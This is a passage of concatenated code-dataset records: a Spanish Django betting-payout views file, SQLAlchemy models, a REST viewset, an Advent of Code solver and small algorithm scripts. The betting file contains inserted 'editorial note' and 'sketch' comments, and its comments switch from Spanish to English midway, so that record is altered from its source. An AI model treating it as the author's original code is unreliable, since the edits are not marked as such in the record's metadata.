get_success_url(self):\n\t\treturn reverse_lazy('detalleC', kwargs={'pk': self.object.id_carr.id,'modal':'show' })\n\nclass RetirarCompetidor(AuthenticatedEncarMixin, UpdateView):\n\tmodel = DetallesCarrera\n\tform_class = FinalizarDetallesForm\n\ttemplate_name = 'carrera/eliminarD.html'\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super().get_context_data(**kwargs)\n\t\tpk = self.kwargs.get('pk')\n\t\tcontext['DetallesCarrera'] = DetallesCarrera.objects.get(id=pk)\n\t\treturn context\n\n\tdef get_success_url(self):\n\t\treturn reverse_lazy('detalleC', kwargs={'pk': self.object.id_carr.id, 'modal':'show'})\n\n\tdef form_valid(self, form): \n\t\tinstance = form.save(commit=False)\n\t\tid_carr = instance.id_carr_id\n\t\tapuestas = Apuesta.objects.filter(id_carr_id=id_carr,tApuesta_id=1) | Apuesta.objects.filter(id_carr_id=id_carr,tApuesta_id=2) |Apuesta.objects.filter(id_carr_id=id_carr,tApuesta_id=3) |Apuesta.objects.filter(id_carr_id=id_carr,tApuesta_id=4) |Apuesta.objects.filter(id_carr_id=id_carr,tApuesta_id=5) |Apuesta.objects.filter(id_carr_id=id_carr,tApuesta_id=6)\n\t\tfor apuesta in apuestas:\n\t\t\tdetalle_apuesta = DetalleApuesta.objects.filter(id_ap_id=apuesta.id,id_cab_id=instance.id_caba_id)\n\t\t\tfor da in detalle_apuesta:\n\t\t\t\tprint(da)\n\t\t\t\tapuesta.estatus='D'\n\t\t\t\tapuesta.save()\n\t\t\t\tt = Transaccion() ##Crea una transacción...\n\t\t\t\tusuario = User.objects.get(id=apuesta.usuario_id) ##Necesito el usuario que ganó, obviamente\n\t\t\t\tusuario.incrementarSaldo(apuesta.idTrans.monto, usuario.username) ##Incrementa el saldo por devolución\n\t\t\t\tt.usua = usuario ##Le asignas el usuario a la transacción\n\t\t\t\tt.fecha = datetime.now() ##La fecha del reparto\n\t\t\t\tt.monto = apuesta.idTrans.monto ##Cuánto ganó\n\t\t\t\tt.tipo = 'c' ##Crédito\n\t\t\t\tt.estado = 'c' ##Operación completada\n\t\t\t\tt.descripcion = 5 ##\"Devolución de Apuesta\"\n\t\t\t\tt.ref = \"-\" ##Referencia\n\t\t\t\tt.save() ##Guarda la transacción en la BD\n\t\treturn super().form_valid(form) \n\nclass ListaDetallesCarrJ(AuthenticatedEncarMixin, ListView):\n\tmodel = DetallesCarrera\n\tsecond_model = Carrera\n\ttemplate_name = \"carrera/listaDetCarr.html\"\n\n\tdef get_context_data(self, **kwargs):\n\t\tpk = self.kwargs.get('pk')\n\t\tcontext = super(ListaDetallesCarrJ, 
self).get_context_data(**kwargs)\n\t\tcontext['competidores'] = DetallesCarrera.objects.filter(id_carr=pk).order_by('posicion')\n\t\tcontext['carrera'] = Carrera.objects.get(id=pk)\n\t\treturn context\n\nclass RegistrarResultados(AuthenticatedEncarMixin, UpdateView):\n\tmodel = DetallesCarrera\n\tform_class = RegistrarResultadosForm\n\ttemplate_name = 'carrera/registrarR.html'\n\t\n\tdef get_success_url(self):\n\t\treturn reverse_lazy('detalleCJ', kwargs={'pk': self.object.id_carr.id })\n\n\tdef form_valid(self, form):\n\t\tinstance = form.save(commit=False)\n\t\tpk = self.kwargs.get('pk')\n\t\tdt = DetallesCarrera.objects.get(id=pk).id_carr.id\n\t\tvalidacionpublicar = DetallesCarrera.objects.extra(select={ \n\t\t\t'esperado': \"count(id)\",\n\t\t\t'guardado': \"count(posicion)\",\n\t\t}, where={\n\t\t\t\"estatus = 'a'\",\n\t\t\t\"id_carr_id=%s\"\n\t\t}, params={dt})\n\t\tfor vp in validacionpublicar:\n\t\t\tif vp.esperado == vp.guardado:\n\t\t\t\tc = Carrera.objects.get(id=dt)\n\t\t\t\tc.publicable = True\n\t\t\t\tc.save()\n\t\t\telse:\n\t\t\t\tc = Carrera.objects.get(id=dt)\n\t\t\t\tc.publicable = False\n\t\t\t\tc.save()\n\t\treturn super().form_valid(form)\n\t\nclass listadoCarreras(ListView):\n\tmodel = Carrera\n\ttemplate_name = \"apuesta/listadoCarreras.html\"\n\t\n\tdef get_context_data(self, **kwargs):\n\t\test = self.kwargs.get('estatus')\n\t\tcontext = super(listadoCarreras, self).get_context_data(**kwargs)\n\t\tcontext[\"object_list\"] = Carrera.objects.filter(id_jh__estatus='a')\n\t\treturn context\n\nclass ConsultarC(DetailView):\n\tmodel = Carrera\n\ttemplate_name = \"carrera/ConsultarC.html\"\n\n\tdef get_context_data(self, **kwargs):\n\t\tpk = self.kwargs.get('pk')\n\t\tcontext = super(ConsultarC, self).get_context_data(**kwargs)\n\t\tcontext['object_list'] = DetallesCarrera.objects.filter(id_carr_id=pk).order_by('posicion', 'numero')\n\t\treturn context\n\ndef RegistrarApuestaGanada(usuario, apuesta, mult=1, monto=0):\n\tt = Transaccion() ##Crea una transacción...\n\tif monto==0:\n\t\tusuario.incrementarSaldo(apuesta.idTrans.monto*apuesta.cuota*mult, usuario.username) ##¡Incrementa el saldo, ganó!\n\telse:\n\t\tusuario.incrementarSaldo(monto, usuario.username) ##¡Incrementa el saldo, ganó!\n\tt.usua = usuario ##Le asignas el usuario a la transacción\n\tt.fecha = datetime.now() ##La fecha del reparto\n\tif monto==0:\n\t\tt.monto = apuesta.idTrans.monto*apuesta.cuota*mult ##Cuánto ganó\n\telse:\n\t\tt.monto = monto\n\tt.tipo = 'c' ##Crédito\n\tt.estado = 'c' ##Operación completada\n\tt.descripcion = 4 ##\"Apuesta ganada\"\n\tt.ref = \"-\" ##Referencia\n\tt.save() ##Guarda la transacción en la BD\n\tapuesta.estatus = 'G'\n\tapuesta.idTransGanada = t\n\tapuesta.save() ##¡La apuesta ganó!\n\ndef RegistrarApuestaPerdida(apuesta):\n\tapuesta.estatus = 'P' \n\tapuesta.save() ##La apuesta perdió :(\n\t\nclass PublicarResultados(AuthenticatedEncarMixin, UpdateView):\n\tmodel = Carrera\n\tform_class = FinalizarCarreraForm\n\ttemplate_name = 'carrera/publicarC.html'\n\tdef get_success_url(self):\n\t\treturn reverse_lazy('listaCr')\n\n\tdef form_valid(self, form): ###Una vez publicados los resultados, es hora de... 
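\t#(Editorial note, not original code: this method both credits user balances and flips bet states;\n\t#wrapping the payout in Django's standard transaction API would prevent half-applied results on failure:\n\t#    from django.db import transaction\n\t#    with transaction.atomic():\n\t#        ...  # scrutiny and payout logic\n\t#)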
¡Escrutinios!\n\t###Por la forma en que lo planteo, realiza escrutinios Y reparte premios al mismo tiempo.\n\t###Hace un escrutinio por cada tipo de apuesta, buscando a los ganadores.\n\t###Comencemos\n\t\tinstance = form.save(commit=False)\n\t\tid_carrera = instance.id ###¿Sobre cuál carrera trabajamos?\n\t\tcaballos = DetallesCarrera.objects.filter(id_carr_id=id_carrera).exclude(posicion=500).order_by('posicion') ###¿Cuáles son los caballos en cuestión? Ordenados por llegada.\n\t\tcaballo_primero = caballos[:1].get().id_caba ###El primer caballo...\n\t\tcaballo_segundo = caballos[1:2].get().id_caba ###El segundo caballo...\n\t\tcaballo_tercero = caballos[2:3].get().id_caba ###El tercer caballo...\n\t\tcaballo_cuarto = caballos[3:4].get().id_caba ###El cuarto caballo...\n\n\t\tapostadores = Apuesta.objects.filter(id_carr_id=id_carrera, estatus='A') ###Vamos a buscar a todos los que apostaron en esta carrera en específico.\n\t\t\n\t\t###APUESTAS TIPO: UNICARRERA\n\t\t###Para las apuestas uni carrera.\n\n\t\t###REPARTICIÓN DE PREMIOS - TIPO DE APUESTA 1: Ganador\n\t\t###En Ganador, se apuesta sólo a un caballo que resulte ganador de una carrera específica.\n\n\t\tapostadores_apGanador = apostadores.filter(tApuesta_id=1) ###...y a estos, los filtramos por los que apostaron a Ganador\n\t\tfor ag in apostadores_apGanador: ###tráete el detalle de la apuesta de todos los apostadores en cuestión\n\t\t\t###Como es apuesta ganador, sólo se trae un objeto (get)\n\t\t\tdetalles_apuesta = DetalleApuesta.objects.get(id_ap_id=ag.id)\n\t\t\tif detalles_apuesta.id_cab == caballo_primero: ##Si el caballo del primer lugar es el mismo caballo al que apostaste, entonces...\n\t\t\t\tRegistrarApuestaGanada(User.objects.get(id=ag.usuario_id),ag)\n\t\t\telse:\n\t\t\t\tRegistrarApuestaPerdida(ag)\n\t\n\t\t###REPARTICIÓN DE PREMIOS - TIPO DE APUESTA 2: Exacta\n\t\t###En el caso de exacta, se trata de que los dos caballos elegidos terminen en 1ra y 2da posición.\n\n\t\tapostadores_apExacta = apostadores.filter(tApuesta_id = 2) ##Tipo de Apuesta Exacta\n\n\t\tfor ae in apostadores_apExacta:\n\t\t\tdetalles_apuesta = DetalleApuesta.objects.filter(id_ap_id=ae.id).order_by('posicion') ##Extraigo todos los detalle apuesta de esa apuesta. Ordeno por posicion.\n\t\t\tif detalles_apuesta[:1].get().id_cab == caballo_primero and detalles_apuesta[1:2].get().id_cab == caballo_segundo: ##Si pegó ambas, entonces...\n\t\t\t\tRegistrarApuestaGanada(User.objects.get(id=ae.usuario_id),ae)\n\t\t\telse:\n\t\t\t\tRegistrarApuestaPerdida(ae)\n\n\t\t###REPARTICIÓN DE PREMIOS - TIPO DE APUESTA 3: Trifecta\n\t\t###Acertar el primer, segundo y tercer lugar exactos.\n\n\t\tapostadores_apTrifecta = apostadores.filter(tApuesta_id = 3) ##Tipo de Apuesta Trifecta\n\n\t\tfor at in apostadores_apTrifecta:\n\t\t\tdetalles_apuesta = DetalleApuesta.objects.filter(id_ap_id=at.id).order_by('posicion') ##Extraigo todos los detalle apuesta de esa apuesta. Ordeno por posicion.
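\t\t\t#(Sketch of an equivalent single-query comparison; 'picks' is a hypothetical local name, not in the original:\n\t\t\t#    picks = [d.id_cab for d in detalles_apuesta[:3]]\n\t\t\t#    gano = (picks == [caballo_primero, caballo_segundo, caballo_tercero])\n\t\t\t#one ordered list comparison instead of three slice-and-get round trips.)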
\t\t\tif detalles_apuesta[:1].get().id_cab == caballo_primero and detalles_apuesta[1:2].get().id_cab == caballo_segundo and detalles_apuesta[2:3].get().id_cab == caballo_tercero: ##Si pegó las tres, entonces...\n\t\t\t\tRegistrarApuestaGanada(User.objects.get(id=at.usuario_id),at)\n\t\t\telse:\n\t\t\t\tRegistrarApuestaPerdida(at)\n\n\t\t###REPARTICIÓN DE PREMIOS - TIPO DE APUESTA 4: Superfecta\n\t\t###Acertar los primeros 4 lugares exactos.\n\n\t\tapostadores_apSuperfecta = apostadores.filter(tApuesta_id = 4) ##Tipo de Apuesta Superfecta\n\n\t\tfor aS in apostadores_apSuperfecta:\n\t\t\tdetalles_apuesta = DetalleApuesta.objects.filter(id_ap_id=aS.id).order_by('posicion') ##Extraigo todos los detalle apuesta de esa apuesta. Ordeno por posicion.\n\t\t\tif detalles_apuesta[:1].get().id_cab == caballo_primero and detalles_apuesta[1:2].get().id_cab == caballo_segundo and detalles_apuesta[2:3].get().id_cab == caballo_tercero and detalles_apuesta[3:4].get().id_cab == caballo_cuarto: ##Si pegó las cuatro, entonces...\n\t\t\t\tRegistrarApuestaGanada(User.objects.get(id=aS.usuario_id),aS)\n\t\t\telse:\n\t\t\t\tRegistrarApuestaPerdida(aS)\n\n\t\t###REPARTICIÓN DE PREMIOS - TIPO DE APUESTA 5: Place\n\t\t###Acertar el primer o segundo lugar\n\n\t\tapostadores_apPlace = apostadores.filter(tApuesta_id = 5) ##Tipo de Apuesta Place\n\n\t\tfor al in apostadores_apPlace:\n\t\t\tdetalles_apuesta = DetalleApuesta.objects.get(id_ap_id=al.id) ##Sólo elegí un caballo.\n\t\t\tif detalles_apuesta.id_cab == caballo_primero or detalles_apuesta.id_cab == caballo_segundo: ##Si llegó primero o segundo, entonces...\n\t\t\t\tRegistrarApuestaGanada(User.objects.get(id=al.usuario_id),al)\n\t\t\telse:\n\t\t\t\tRegistrarApuestaPerdida(al)\n\n\t\t###REPARTICIÓN DE PREMIOS - TIPO DE APUESTA 6: Show\n\t\t###Acertar el primer, segundo o tercer lugar\n\n\t\tapostadores_apShow = apostadores.filter(tApuesta_id = 6) ##Tipo de Apuesta Show\n\n\t\tfor ah in apostadores_apShow:\n\t\t\tdetalles_apuesta = DetalleApuesta.objects.get(id_ap_id=ah.id) ##Sólo elegí un caballo.\n\t\t\tif detalles_apuesta.id_cab == caballo_primero or detalles_apuesta.id_cab == caballo_segundo or detalles_apuesta.id_cab == caballo_tercero: ##Si llegó primero, segundo o tercero, entonces...\n\t\t\t\tRegistrarApuestaGanada(User.objects.get(id=ah.usuario_id),ah)\n\t\t\telse:\n\t\t\t\tRegistrarApuestaPerdida(ah)\n\n\t\t###MULTICARRERAS\n\t\t###5y6, PollaMax. Lo primero es saber si la carrera pertenece a alguno de estos tipos de apuesta.\n\n\t\tjornada = JornadaH.objects.get(id=instance.id_jh_id) ##Necesito traerme la jornada hípica.\n\t\tcarreras_jornada = Carrera.objects.filter(id_jh=jornada).order_by('-hora') ##Todas las carreras de la jornada, ordenadas de la última a la primera.\n\t\tcarreras_5y6 = carreras_jornada[:6] ##Tengo las últimas 6 carreras de la jornada, las que aplican a 5y6 y pollamax juntas.\n\t\tcarrera_polla = carreras_jornada[6:7].get() ##Tengo la 7ma última carrera de la jornada, que aplica a pollamax\n\t\tultima_carrera = carreras_jornada[:1].get() ##Tengo la última carrera de la jornada, para repartir premios tanto de pollamax como de 5y6\n\n\t\tapostadores_ap5y6 = apostadores.filter(tApuesta_id=7) ##Tipo de apuesta 5y6\n\t\tapostadores_pollamax = apostadores.filter(tApuesta_id=8) ##Tipo de apuesta Polla Max\n\n\t\tfor carrera in carreras_5y6:\n\t\t\tif carrera == instance: ##¿La carrera está en 5y6? Entonces reparte premios de 5y6 y pollamax.
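\t\t\t\t#(Sketch: the 5/2/1 point scheme assigned in the blocks below could be table-driven; 'PUNTOS' is a\n\t\t\t\t#hypothetical mapping with the same comparison semantics:\n\t\t\t\t#    PUNTOS = {caballo_primero: 5, caballo_segundo: 2, caballo_tercero: 1}\n\t\t\t\t#    da.monto = PUNTOS.get(da.id_cab, 0); da.save()\n\t\t\t\t#)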
\t\t\t\tfor a5 in apostadores_ap5y6: ##Recorro cada una de las apuestas que hay de 5y6\n\t\t\t\t\tdetalles_apuesta = DetalleApuesta.objects.filter(id_ap_id=a5.id) ##Me traigo todos los detalle_apuesta que puede tener\n\t\t\t\t\tfor da in detalles_apuesta: ##Recorro todos los detalle_apuesta\n\t\t\t\t\t\tif da.id_cab == caballo_primero: ##¿El caballo del detalle_apuesta es el ganador?\n\t\t\t\t\t\t\tda.posicion = 100 ##En efecto, el detalle_apuesta resultó ganador. Después contaré la cantidad que resultó.\n\t\t\t\t\t\t\tda.save()\n\n\t\t\t\tfor am in apostadores_pollamax: ##Recorro cada una de las apuestas que hay de polla max\n\t\t\t\t\tdetalles_apuesta = DetalleApuesta.objects.filter(id_ap_id=am.id) ##Me traigo todos los detalles\n\t\t\t\t\tfor da in detalles_apuesta: ##Recorro todos los detalle_apuesta\n\t\t\t\t\t\tif da.id_cab == caballo_primero: ##El caballo ganó.\n\t\t\t\t\t\t\tda.monto = 5 ##Le asigno 5 pts\n\t\t\t\t\t\t\tda.save()\n\t\t\t\t\t\telif da.id_cab == caballo_segundo: ##El segundo lugar.\n\t\t\t\t\t\t\tda.monto = 2 ##Le asigno 2 pts\n\t\t\t\t\t\t\tda.save()\n\t\t\t\t\t\telif da.id_cab == caballo_tercero: ##El tercer lugar\n\t\t\t\t\t\t\tda.monto = 1 ##Le asigno 1 pt\n\t\t\t\t\t\t\tda.save()\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tda.monto = 0 ##No tuvo puntos\n\t\t\t\t\t\t\tda.save()\n\n\t\tif instance == carrera_polla: ##Si la carrera es la 7ma última (PollaMax)\n\t\t\tfor am in apostadores_pollamax: ##Recorro cada una de las apuestas que hay de polla max\n\t\t\t\tdetalles_apuesta = DetalleApuesta.objects.filter(id_ap_id=am.id) ##Me traigo todos los detalles\n\t\t\t\tfor da in detalles_apuesta: ##Recorro todos los detalle_apuesta\n\t\t\t\t\tif da.id_cab == caballo_primero: ##El caballo ganó.\n\t\t\t\t\t\tda.monto = 5 ##Le asigno 5 pts\n\t\t\t\t\t\tda.save()\n\t\t\t\t\telif da.id_cab == caballo_segundo: ##El segundo lugar.\n\t\t\t\t\t\tda.monto = 2 ##Le asigno 2 pts\n\t\t\t\t\t\tda.save()\n\t\t\t\t\telif da.id_cab == caballo_tercero: ##El tercer lugar\n\t\t\t\t\t\tda.monto = 1 ##Le asigno 1 pt\n\t\t\t\t\t\tda.save()\n\t\t\t\t\telse:\n\t\t\t\t\t\tda.monto = 0 ##No tuvo puntos\n\t\t\t\t\t\tda.save()\n\n\t\t###################################################################################\n\t\t\n\t\t##Lista la repartición individual. Ahora vamos a comenzar con las reparticiones de la última carrera de la jornada\n\t\t##(de la apuesta multicarrera)\n\t\t\n\t\tif instance == ultima_carrera: ##Si estamos en la última carrera de la jornada...\n\t\t\tjornada.estatus = 'f' ##Registro la jornada como finalizada\n\t\t\tjornada.save() ##Guardo en la BD\n\t\t\tfor ap5 in apostadores_ap5y6: ##Recorro los apostadores de 5y6.
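\t\t\t\t#(Sketch of a compact alternative for the hit count computed below, using a standard ORM filter:\n\t\t\t\t#    count = DetalleApuesta.objects.filter(id_ap_id=ap5.id, posicion=100).count()\n\t\t\t\t#)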
(5y6)\n\t\t\t\tdetalles_apuesta = DetalleApuesta.objects.filter(id_ap_id=ap5.id) ##Fetch the detalleapuesta rows.\n\t\t\t\tcount = 0 ##Count how many times the bet hit.\n\t\t\t\tfor da in detalles_apuesta: ##Iterate.\n\t\t\t\t\tif da.posicion == 100: ##It hit indeed.\n\t\t\t\t\t\tcount+=1 ##Increment the count\n\t\t\t\t##Now check whether it actually won.\n\t\t\t\tif count==5: ##5 correct: a winner!\n\t\t\t\t\tRegistrarApuestaGanada(User.objects.get(id=ap5.usuario_id),ap5,mult=0.75)\n\t\t\t\telif count==6: ##All 6 correct: full prize.\n\t\t\t\t\tRegistrarApuestaGanada(User.objects.get(id=ap5.usuario_id),ap5)\n\t\t\t\telse:\n\t\t\t\t\tRegistrarApuestaPerdida(ap5)\n\t\t\t##For the PollaMax payout we must first compute the pot and each winner's share.\n\t\t\tpote = 0 #Initialize\n\t\t\tfor ap in apostadores_pollamax:\n\t\t\t\tpote += ap.monto ##Add the bet amount\n\n\t\t\t##With the pot ready, count how many people won. You win with a score above 30.\n\t\t\tpote = pote * 0.75 #This is the final pot (75% of what came in)\n\t\t\tganadores = 0 #How many people won\n\n\t\t\tfor ap in apostadores_pollamax: #Count how many people won\n\t\t\t\tdetalles_apuesta = DetalleApuesta.objects.filter(id_ap_id=ap.id) ##Fetch the detalleapuesta rows.\n\t\t\t\tcount = 0 ##Add up the score obtained\n\t\t\t\tfor da in detalles_apuesta: ##Iterate.\n\t\t\t\t\tcount += da.monto\n\t\t\t\tif count > 30: #With more than 30 points, the user won\n\t\t\t\t\tganadores += 1 ##Count it\n\t\t\tmonto = pote / ganadores if ganadores else 0 ##The actual amount to pay each winner (avoid dividing by zero when nobody won)\n\t\t\t##Now we have the final amount. Proceed to pay out (finally)\n\t\t\tfor ap in apostadores_pollamax: #Now see who won\n\t\t\t\tdetalles_apuesta = DetalleApuesta.objects.filter(id_ap_id=ap.id) ##Fetch the detalleapuesta rows.\n\t\t\t\tcount = 0 ##Add up the score obtained\n\t\t\t\tfor da in detalles_apuesta: ##Iterate.\n\t\t\t\t\tcount += da.monto\n\t\t\t\tif count > 30: #With more than 30 points, the user won\n\t\t\t\t\tRegistrarApuestaGanada(User.objects.get(id=ap.usuario_id),ap,monto=monto)\n\t\t\t\telse:\n\t\t\t\t\tRegistrarApuestaPerdida(ap)\n\t\t##End of the algorithm.\n\t\treturn super().form_valid(form)\n\n","repo_name":"ajav06/FlyHorse","sub_path":"apps/jornada/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":23502,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73470084995","text":"'''\nModule for database tables\n'''\n\n__author__ = 'Elisha Yadgaran'\n\n\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, Numeric, DateTime, func, BigInteger\nfrom sqlalchemy_mixins import AllFeaturesMixin\n\n\nBase = declarative_base()\n\n\nclass BaseModel(Base, AllFeaturesMixin):\n    __abstract__ = True\n    created_timestamp = Column(DateTime(timezone=True), nullable=False, server_default=func.now())\n    modified_timestamp = Column(DateTime(timezone=True), nullable=True, server_onupdate=func.now())\n    id = Column(BigInteger, primary_key=True)\n\n\nclass Feedback(BaseModel):\n    __tablename__ = 'requests'\n\n    feedback = Column(String(1200), nullable=False)\n\n\nclass ModelHistory(BaseModel):\n    __tablename__ = 'model_history'\n\n    filename = Column(String())\n    prediction_probability = Column(Numeric)\n    prediction = Column(Integer)\n    user_label = Column(Integer)\n    label = 
Column(Integer)\n\n\nclass UserLabel(BaseModel):\n    __tablename__ = 'user_labels'\n\n    user_label = Column(String(12), nullable=False)\n\n\nclass SquirrelDescription(BaseModel):\n    __tablename__ = \"squirrel_descriptions\"\n\n    filename = Column(String(), unique=True)\n    description = Column(String())\n","repo_name":"eyadgaran/squirrel-not-squirrel","sub_path":"squirrel/database/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"37764569959","text":"from django.shortcuts import render\n\n# Create your views here.\n\nfrom rest_framework import viewsets, permissions\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\nfrom utils.mixins import RunMixin\nfrom .models import Interfaces\nfrom . import serializers\nfrom testcases.models import Testcases\n\nfrom configures.models import Configures\n\n\nclass InterfacesViewSet(RunMixin, viewsets.ModelViewSet):\n    \"\"\"\n    create:\n    Create an interface record\n\n    list:\n    Get the list of interfaces\n\n    retrieve:\n    Get the details of an interface\n\n    update:\n    Update an interface\n\n    delete:\n    Delete an interface\n\n    testcases:\n    Get the interface's test cases\n\n    configures:\n    Get the interface's configuration info\n\n    \"\"\"\n    queryset = Interfaces.objects.all()\n    serializer_class = serializers.InterfacesModelSerializer\n    permission_classes = [permissions.IsAuthenticated]\n\n    def list(self, request, *args, **kwargs):\n        \"\"\"\n        Override the list method to additionally return testcases and configures data\n        testcases: test case info for the interface\n        configures: configuration info for the interface\n        :param request:\n        :param args:\n        :param kwargs:\n        :return:\n        \"\"\"\n        response = super().list(request, *args, **kwargs)\n        for item in response.data['results']:\n            item['testcases'] = Testcases.objects.filter(interface_id=item.get('id')).count()\n            item['configures'] = Configures.objects.filter(interface_id=item.get('id')).count()\n        return response\n\n    @action(detail=True)\n    def testcases(self, request, *args, **kwargs):\n        \"\"\"\n        Get the interface's test case info\n        :param request:\n        :param args:\n        :param kwargs:\n        :return:\n        \"\"\"\n        response = super().retrieve(request, *args, **kwargs)\n        response.data = response.data.get('testcases_set')\n        return response\n\n    @action(detail=True)\n    def configures(self, request, *args, **kwargs):\n        \"\"\"\n        Get the interface's configuration info\n        :param request:\n        :param args:\n        :param kwargs:\n        :return:\n        \"\"\"\n        response = super().retrieve(request, *args, **kwargs)\n        response.data = response.data.get('configures')\n        return response\n\n    def get_testcase_qs(self):\n        \"\"\"\n        Get the test case queryset\n        :return: the test cases, as a QuerySet\n        \"\"\"\n        instance = self.get_object()\n        qs = Testcases.objects.filter(interface=instance)\n        return qs\n\n    def get_serializer_class(self):\n        \"\"\"\n        Override the parent method to pick a serializer class based on the current action\n        :return:\n        \"\"\"\n        if self.action == 'testcases':\n            return serializers.TestcasesInterfacesModelSerializer\n        elif self.action == 'configures':\n            return serializers.ConfiguresInterfacesModelSerializer\n        elif self.action == 'run':\n            return serializers.InterfacesRunModelSerializer\n        else:\n            return super().get_serializer_class()\n","repo_name":"hzauliyanda/django_test","sub_path":"apps/interfaces/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4285682755","text":"import logging\nfrom collections import defaultdict\n\nimport numpy as np\n\nlogging.basicConfig(\n    level=logging.DEBUG,\n    handlers=[logging.StreamHandler(), logging.FileHandler(\"log.log\")],\n)\n\nlog = logging.getLogger(__name__)\n\n\nfrom day05 
import (\n    add,\n    equals,\n    input_,\n    jump_if_false,\n    jump_if_true,\n    less_than,\n    mult,\n    parse_opcode,\n    parse_parameters,\n)\nfrom day09 import adjust_base\n\n\ndef output_(tape, register):\n\n    output, _, _ = parse_parameters(tape, register)\n    # instruction_pointer = register[\"instruction_pointer\"]\n    # output = tape[instruction_pointer + 1]\n    # output = output if register[\"parameter1_mode\"] else tape[output]\n    register[\"output\"].append(output)\n    register[\"instruction_pointer\"] += 2\n    # log.debug(\"Output: %s\", output)\n    return tape, register\n\n\noperation = {\n    1: add,\n    2: mult,\n    3: input_,\n    4: output_,\n    5: jump_if_true,\n    6: jump_if_false,\n    7: less_than,\n    8: equals,\n    9: adjust_base,\n}\n\n\ndef process_tape(tape, input_list):\n    register = dict(\n        instruction_pointer=0,\n        opcode=0,\n        parameter1_mode=0,\n        parameter2_mode=0,\n        parameter3_mode=0,\n        input_list=input_list,\n        input=input_list[0],\n        output=[],\n        relative_base=0,\n    )\n    while True:\n\n        parse_opcode(tape[register[\"instruction_pointer\"]], register)\n        opcode = register[\"opcode\"]\n        # log.debug(\"Current Output: %s\", register[\"output\"])\n        # log.debug(\"Current OpCode: %s\", register[\"opcode\"])\n        if opcode == 99:\n            return tape, register\n        else:\n            tape, register = operation[opcode](tape, register)\n\n\ndef part2(tape):\n    tape[0] = 2\n    inp = 2\n    while True:\n        t, r = process_tape(tape, [inp])\n        output_array = np.array(r[\"output\"], dtype=int).reshape(-1, 3)\n\n        picture = np.zeros((101, 101), dtype=int)\n        for sequence in output_array:\n            x, y, symbol = sequence\n            if x == -1 and y == 0:\n                current_score = symbol\n                continue\n            picture[x][y] = symbol\n        log.debug(\"Current score: %s\", current_score)\n        paddle, _ = np.where(picture == 3)\n        ball, _ = np.where(picture == 4)\n        paddle = paddle[0]\n        ball = ball[0]\n\n        if ball < paddle:\n            inp = -1\n        elif ball > paddle:\n            inp = 1\n        else:\n            inp = 0\n\n\nif __name__ == \"__main__\":\n\n    with open(\"day13_input.txt\") as f:\n        original_list = [int(x) for x in f.readline().split(\",\")]\n\n    # convert tape from list to default dict\n    original_tape = defaultdict(int)\n    for k, v in enumerate(original_list):\n        original_tape[k] = v\n\n    tape = original_tape.copy()\n    t, r = process_tape(tape, [1])\n    output_array = np.array(r[\"output\"], dtype=int).reshape(-1, 3)\n\n    picture = np.zeros((50, 50), dtype=int)\n    for sequence in output_array:\n        x, y, symbol = sequence\n        picture[x][y] = symbol\n\n    log.info(\"Part1 solution: %s\", np.sum(picture == 2))  # 341\n    tape = original_tape.copy()\n    log.info(\"Part2 solution: %s\", part2(tape))  #\n","repo_name":"kbaikov/adventofcode2019","sub_path":"day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21225877056","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\ndef findnum(lst:list,target:int):\n    \"\"\"\n\n    Given a list of integers, find 2 numbers in it whose sum equals a specified value.\n    E.g. for lst =[1,5,2,7,4,9] and target value 11, the pair 2 and 9 can be found since 2+9=11\n    \"\"\"\n\n    for i in range(len(lst)):\n        for j in range(i+1,len(lst)):\n            if lst[i] + lst[j] == target:\n                print('In list {}, {} and {} sum to {}'.format(lst,lst[i],lst[j],target))\n\n\n\nfindnum([1,5,2,7,4,9],11)\n","repo_name":"magedus/python-11","sub_path":"chenguowen/week8/findnum.py","file_name":"findnum.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"zh","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"5435348277","text":"def selectionSort(arr):\n    size = len(arr)\n    for i in range(0, 
size):\n minIndex = i\n for j in range(i+1, size):\n if arr[j] < arr[minIndex]: \n minIndex = j\n arr[i], arr[minIndex] = arr[minIndex], arr[i]\n return arr\na = [12,32,52,10,22,3,5,13,7,9,4]\nprint(selectionSort(a))","repo_name":"varnitmittal/quarantine-coding-revision","sub_path":"Algo/Sorting/selectionsort.py","file_name":"selectionsort.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35634154454","text":"#!/usr/bin/env python3\n\n\"\"\"\nConvert a PLINK format pedigree \"fam\" file into a \"def\" file for input into\nPed-sim.\n\nThe input file can be tab or space separated and should have the following\ncolumns in this order:\n\nFAM_ID INDIV_ID FATHER_ID MOTHER_ID SEX PHENO\n\nThe IDs can be either integers or strings, and the sex should be 1 for male, 2\nfor female.\n\nAuthor: Sara Mathieson\nDate: 05/08/20\n\"\"\"\n\nfrom collections import defaultdict\nimport optparse\nimport sys\n\n################################################################################\n# CLASSES\n################################################################################\n\nclass Generation:\n \"\"\"Keeps track of the ordered branches in a generation\"\"\"\n\n def __init__(self):\n self.branches = []\n\n def __str__(self):\n return \", \".join(self.branches)\n\n def add_branch(self, bid):\n \"\"\"Add a branch with the given individual's ID\"\"\"\n assert bid not in self.branches\n self.branches.append(bid)\n\n def find_branch(self, pid):\n \"\"\"Given parent ID, find the branch index of the parent\"\"\"\n lst = []\n for i, bid in enumerate(self.branches):\n if pid == bid:\n lst.append(i)\n\n # make sure parent appears in at most one branch\n assert len(lst) <= 1\n if len(lst) == 1:\n return lst[0]\n return None\n\nclass Individual:\n \"\"\"Keeps track information about each individual in the 